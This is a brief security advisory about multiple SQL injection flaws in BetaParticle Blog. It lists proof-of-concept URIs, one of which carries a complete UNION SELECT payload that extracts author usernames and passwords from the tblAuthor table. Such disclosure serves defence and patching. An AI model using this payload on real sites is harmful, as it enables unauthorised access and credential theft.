BetaParticle Blog Multiple SQL Injection Vulnerabilities

BetaParticle Blog Multiple SQL Injection Vulnerabilities

These issues can be exploited via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/bpdir/template_permalink.asp?id=[SQLQuery]

http://www.example.com/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]

http://www.example.com/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1